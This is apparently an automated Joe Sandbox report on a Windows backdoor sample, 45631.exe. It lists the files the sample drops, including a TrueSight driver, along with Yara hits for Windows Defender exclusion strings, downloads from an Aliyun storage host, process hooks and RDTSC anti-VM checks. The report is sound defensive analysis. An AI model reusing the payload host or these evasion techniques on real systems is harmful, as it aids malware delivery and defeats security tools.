Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
45631.exe

Overview

General Information

Sample name:45631.exe
Analysis ID:1583301
MD5:71fb431d4793bb51ce762dc5d719a730
SHA1:39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
SHA256:01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • 45631.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\45631.exe" MD5: 71FB431D4793BB51CE762DC5D719A730)
  • eSmF2v.exe (PID: 4428 cmdline: C:\Users\user\Documents\eSmF2v.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • eSmF2v.exe (PID: 4676 cmdline: C:\Users\user\Documents\eSmF2v.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
4.2.eSmF2v.exe.26a0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
5.2.eSmF2v.exe.2680000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 45631.exeAvira: detected
Source: 45631.exeVirustotal: Detection: 37%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe, 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000004.00000000.3089723227.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000005.00000002.3261596886.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000005.00000000.3228918543.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe.0.dr
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB2A1B8 FindFirstFileExW,4_2_00007FF8BFB2A1B8
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DFFE
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDFF
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]4_2_0000000140011270
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DE96
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DEFB
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000E178
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: ry2ihs.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, eSmF2v.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: eSmF2v.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/
Source: 45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/M
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2965202615.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2965202615.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif
Source: 45631.exe, 00000000.00000003.2965202615.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifjing.aliyuncs.com/N
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.5:49975 version: TLS 1.2

System Summary

barindex
Source: 4.2.eSmF2v.exe.26a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.eSmF2v.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140006C95 NtAllocateVirtualMemory,4_2_0000000140006C95
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000C3F04_2_000000014000C3F0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000CC004_2_000000014000CC00
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140001A304_2_0000000140001A30
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000C2A04_2_000000014000C2A0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400022C04_2_00000001400022C0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400110F04_2_00000001400110F0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140010CF04_2_0000000140010CF0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400093004_2_0000000140009300
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000BB704_2_000000014000BB70
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140003F804_2_0000000140003F80
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00000001400103D04_2_00000001400103D0
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB302484_2_00007FF8BFB30248
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_00007FF8BFB2A1B84_2_00007FF8BFB2A1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\eSmF2v.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 45631.exe
Source: 45631.exe, 00000000.00000000.2017182028.000000014001D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe
Source: 45631.exeBinary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe
Source: 4.2.eSmF2v.exe.26a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.eSmF2v.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal88.evad.winEXE@3/12@1/1
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
Source: C:\Users\user\Documents\eSmF2v.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0000000140001430
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].datJump to behavior
Source: C:\Users\user\Desktop\45631.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\eSmF2v.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 45631.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\45631.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 45631.exeVirustotal: Detection: 37%
Source: C:\Users\user\Desktop\45631.exeFile read: C:\Users\user\Desktop\45631.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\45631.exe "C:\Users\user\Desktop\45631.exe"
Source: unknownProcess created: C:\Users\user\Documents\eSmF2v.exe C:\Users\user\Documents\eSmF2v.exe
Source: unknownProcess created: C:\Users\user\Documents\eSmF2v.exe C:\Users\user\Documents\eSmF2v.exe
Source: C:\Users\user\Desktop\45631.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\45631.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 45631.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 45631.exeStatic file information: File size 31614976 > 1048576
Source: 45631.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 45631.exe, 00000000.00000003.2965271504.0000000004A07000.00000004.00000020.00020000.00000000.sdmp, eSmF2v.exe, 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000004.00000000.3089723227.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000005.00000002.3261596886.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe, 00000005.00000000.3228918543.0000000140014000.00000002.00000001.01000000.00000008.sdmp, eSmF2v.exe.0.dr
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\eSmF2v.exeJump to dropped file
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\eSmF2v.exeJump to dropped file
Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\eSmF2v.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\eSmF2v.exeMemory written: PID: 4428 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeMemory written: PID: 4428 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeMemory written: PID: 4676 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\eSmF2v.exeMemory written: PID: 4676 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\45631.exeRDTSC instruction interceptor: First address: 140001121 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
Source: C:\Users\user\Desktop\45631.exeRDTSC instruction interceptor: First address: 140001137 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007F3BA4F059C6h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc
Source: C:\Users\user\Desktop\45631.exeWindow / User API: threadDelayed 625Jump to behavior
Source: C:\Users\user\Desktop\45631.exeWindow / User API: threadDelayed 374Jump to behavior
